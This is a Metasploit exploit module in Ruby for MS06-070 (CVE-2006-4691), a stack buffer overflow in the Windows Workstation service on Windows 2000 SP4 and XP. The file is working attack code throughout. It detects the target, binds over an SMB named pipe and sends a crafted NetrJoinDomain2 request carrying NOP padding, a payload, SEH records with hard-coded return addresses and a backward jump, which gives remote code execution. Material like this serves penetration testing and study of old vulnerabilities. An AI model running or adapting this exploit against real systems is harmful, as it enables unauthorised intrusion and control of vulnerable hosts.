##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Exploit module for MS06-070 / CVE-2006-4691 (see 'References' below).
  #
  # From a defender's point of view the observable behaviour is a DCERPC
  # bind to the Workstation service interface over an SMB named pipe
  # followed by a single NetrJoinDomain2-style request carrying a name
  # field several kilobytes long; hosts patched for MS06-070 are not
  # affected.
  #
  # Manual rank: the vulnerable code path is only reached when DOMAIN
  # names a real, reachable Windows domain (see the description and the
  # DOMAIN option), so the module cannot be run blind.
  Rank = ManualRanking # Requires valid/working DOMAIN + DC

  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client
  include Msf::Exploit::Seh

  # Declares module metadata, targets and options.
  #
  # Target 0 is 'Automatic' and is resolved in #exploit from the SMB peer
  # OS string; targets 1 and 2 carry the per-OS 'Offset' (distance, in
  # bytes, from the start of the overflow buffer to the SEH record) and
  # 'Ret' (pop/pop/ret address) consumed by #exploit. The `* 2` in each
  # Offset presumably reflects a UTF-16 character count -- confirm
  # against the original analysis.
  #
  # @param info [Hash] metadata merged over the defaults by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow',
        'Description' => %q{
This module exploits a stack buffer overflow in the NetApi32 NetpManageIPCConnect
function using the Workstation service in Windows 2000 SP4 and Windows XP SP2.

In order to exploit this vulnerability, you must specify the name of a
valid Windows DOMAIN. It may be possible to satisfy this condition by using
a custom DNS and LDAP setup, however that method is not covered here.

Although Windows XP SP2 is vulnerable, Microsoft reports that Administrator
credentials are required to reach the vulnerable code. Windows XP SP1 only
requires valid user credentials. Also, testing shows that a machine already
joined to a domain is not exploitable.
},
        'Author' => [
          'jduck'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2006-4691' ],
          [ 'OSVDB', '30263' ],
          [ 'BID', '20985' ],
          [ 'MSB', 'MS06-070' ],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
        },
        'Privileged' => true,
        'Payload' => {
          'Space' => 1024,
          # NUL is excluded presumably because the buffer travels inside a
          # NUL-terminated string (see the "\x00\x00" terminator in #exploit).
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        'Targets' => [
          [ 'Automatic Targetting', {} ],
          [
            'Windows 2000 SP4',
            {
              'Offset' => (1058 * 2),
              'Ret' => 0x75022ac4 # pop/pop/ret in ws2help.dll
            }
          ],
          [
            'Windows XP SP0/SP1',
            {
              'Offset' => (1290 * 2),
              'Ret' => 0x71ab21cd # pop/pop/ret in ws2_32.dll
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2006-11-14',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('SMBPIPE', [ true, "The pipe name to use.", 'WKSSVC']),
        # NOTE: a valid domain name is required. See description.
        OptString.new('DOMAIN', [ true, "The domain to validate prior to joining it."])
      ]
    )

    # #exploit always connects with versions: [1] (SMB1), so the generic
    # protocol-version option would be misleading here.
    deregister_options('SMB::ProtocolVersion')
  end

  # Runs the exploit: resolves the target, binds to the Workstation
  # service over the named pipe, and sends one request whose name field
  # overflows the stack buffer.
  #
  # Flow:
  # 1. SMB1 connect + login.
  # 2. Target selection. For 'Automatic', the SMB peer OS string picks
  #    targets[1] ('Windows 5.0') or targets[2] ('Windows 5.1'); anything
  #    else aborts with Failure::NoTarget.
  # 3. DCERPC bind to the interface UUID below over ncacn_np on SMBPIPE.
  # 4. Build the NDR stub and call opnum 0x16 (22).
  #
  # Raises whatever dcerpc.call raises, except NoResponse and an error
  # mentioning STATUS_PIPE_DISCONNECTED, which are treated as the expected
  # aftermath of the request.
  def exploit
    connect(versions: [1])
    smb_login()

    mytarget = nil
    if (target.name =~ /Automatic/)
      case smb_peer_os()
      when 'Windows 5.0'
        print_status("Detected a Windows 2000 target")
        mytarget = targets[1]
      when 'Windows 5.1'
        # Probe: opening \SRVSVC tells SP0/SP1 apart from SP2. An
        # STATUS_ACCESS_DENIED (0xc0000022) is taken to mean SP2 without
        # Administrator rights, which the description says cannot reach
        # the vulnerable code.
        begin
          smb_create("\\SRVSVC")
          print_status("Detected a Windows XP SP0/SP1 target")
        rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
          if (e.error_code == 0xc0000022)
            # NOTE(review): Failure::NoAccess would describe this condition
            # more precisely than Failure::Unknown.
            fail_with(Failure::Unknown, "Windows XP SP2 requires Administrator privileges!")
          end
          # Any other SMB error code falls through and still uses the XP target.
          print_status("Detected a Windows XP target (unknown patch level)")
        end
        mytarget = targets[2]
      else
        fail_with(Failure::NoTarget, "No target detected for #{smb_peer_os()}/#{smb_peer_lm()}...")
      end
    else
      mytarget = target
    end

    # Workstation service interface, reached over the pipe named by SMBPIPE
    # (default WKSSVC).
    handle = dcerpc_handle(
      '6bffd098-a112-3610-9833-46c3f87e345a', '1.0',
      'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
    )

    print_status("Binding to #{handle} ...")
    dcerpc_bind(handle)
    print_status("Bound to #{handle} ...")

    print_status("Building the stub data...")

    # Overflow buffer embedded in the name field: NOP padding up to the
    # target Offset, the encoded payload, the SEH record built from the
    # target's Ret, then a jump `distance` bytes backwards. 'Space' (1024)
    # is smaller than either Offset, so the padding length stays positive.
    distance = mytarget['Offset']
    hostname = make_nops(distance - payload.encoded.length)
    hostname << payload.encoded
    hostname << generate_seh_record(mytarget.ret)
    hostname << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string

    # "<DOMAIN>\\L" as UTF-16LE, followed by the raw overflow buffer,
    # 3000 random alphanumerics (6000 bytes once widened) and a wide NUL.
    name = datastore['DOMAIN'] + "\\\\L"
    name = Rex::Text.to_unicode(name)
    name << hostname
    name << Rex::Text.to_unicode(rand_text_alphanumeric(1000) * 3)
    name << "\x00\x00"

    # Argument order follows the NetrJoinDomain2 IDL quoted at the end of
    # this file: server name (\\RHOST), the oversized name, two empty
    # strings, a null (0) unique pointer for arg_5 and the integer arg_6.
    stub =
      NDR.uwstring("\\\\#{datastore['RHOST']}") +
      NDR.UnicodeConformantVaryingStringPreBuilt(name) +
      NDR.uwstring("") +
      NDR.uwstring("") +
      NDR.long(0) +
      NDR.long(1)

    print_status("Calling the vulnerable function...")

    # Opnum 0x16 (22). A missing response is tolerated (presumably the
    # service has already crashed or is running the payload); a pipe
    # disconnect is likewise expected. Anything else is re-raised.
    begin
      dcerpc.call(0x16, stub)
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse
    rescue => e
      if e.to_s !~ /STATUS_PIPE_DISCONNECTED/
        raise e
      end
    end

    # Cleanup
    handler
    disconnect
  end
end
=begin

The IDL for NetrJoinDomain2 looks like this:
long _NetrJoinDomain2@28 (
  [in][unique][string] wchar_t * arg_1,
  [in][string] wchar_t * arg_2,
  [in][unique][string] wchar_t * arg_3,
  [in][unique][string] wchar_t * arg_4,
  [in][unique] struct_C * arg_5,
  [in] long arg_6
);


1. --> dns server - query for IN.SRV _ldap._tcp.dc._msdcs.DOMAIN
2. <-- dns server - response including answer and additional record.
   answer: whateverserver.DOMAIN priority 0 / weight 100 / port 389
   additional: IN.A address of whateverserver.DOMAIN
3. --> ldap server - baseObject query with filter/attributes:
   - filter: (&(&(DnsDomain=DOMAIN)(Host=TARGETHOSTNAME))(NtVer=06:00:00:00))
   - attributes: AttributeDescriptionList: NetLogon
4. <-- ldap server - searchResDone success, attributes data
   - PartialAttributeList netlogon - 1 item
     - type 23, flags 0x1fd, domain GUID,
       forest, domain, hostname, netbios domain, netbios hostname,
       user, site, client site, version, lmtoken, nttoken
5. validated.

=end